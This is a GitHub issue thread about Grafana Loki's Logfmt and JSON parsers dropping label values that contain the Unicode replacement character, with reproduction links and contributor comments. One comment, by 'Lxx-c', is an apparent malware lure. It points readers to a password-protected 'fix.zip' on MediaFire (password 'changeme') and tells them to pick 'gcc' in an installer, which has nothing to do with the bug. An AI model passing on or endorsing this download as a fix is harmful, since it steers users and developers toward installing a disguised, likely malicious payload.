### ISSUE TITLE
[loki] Json|Logfmt Parser returns empty label value if it contains symbol `�`

### ISSUE THREAD

**Issue by vlad-diachenko** [grafana/loki#13963]
**Describe the bug**

When the Logfmt or JSON parser meets the symbol `�` inside the label value, it skips the whole label or replaces the value with an empty string.  

Loki drops the value([here](https://github.com/grafana/loki/blob/4c88be0ef2310406206c02d7747bf73b51c95bda/pkg/logql/log/parser.go#L205) and [here](https://github.com/grafana/loki/blob/4c88be0ef2310406206c02d7747bf73b51c95bda/pkg/logql/log/parser.go#L343)) because PromQL engine fails the query if it meets such symbols. 

**To Reproduce**
Open LogQL analyzer page and run the query:

1. [Logfmt example](https://grafana.com/docs/loki/latest/query/analyzer/?query=%7C+logfmt+&line%5B%5D=level%3Dinfo+ts%3D2022-03-23T11%3A55%3A29.846163306Z+caller%3Dmain.go%3A112+msg%3D%22Starting+%EF%BF%BD+Enterprise+Logs%22)
<img width="1011" alt="image" src="https://github.com/user-attachments/assets/f0b8ea79-a8fd-4717-9712-b03a4bcb9316">

2. [JSON example](https://grafana.com/docs/loki/latest/query/analyzer/?query=%7C+json+&line%5B%5D=%7B%22timestamp%22%3A%222022-04-26T08%3A53%3A59.61Z%22%2C%22level%22%3A%22INFO%22%2C%22message%22%3A%22Starting+%EF%BF%BD+Enterprise+Logs%22%7D)
<img width="1081" alt="image" src="https://github.com/user-attachments/assets/93dd1c0a-efd7-42c0-9c3c-dc3457cbba16">

**Expected behavior**
Label value must be replaced with ` `(symbol: space) instead of dropping the label or label value. 

**Environment:**
 - Infrastructure: any
 - Deployment tool: any

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Manish-Giri** [comment]
Hi, if this is open for contributions, can I give it a shot?

**Comment by vlad-diachenko** [comment]
> Hi, if this is open for contributions, can I give it a shot?

Hey, @Manish-Giri . Sure, the help is more than appreciated! 
Do you now when you can provide a fix? just to understand ETA
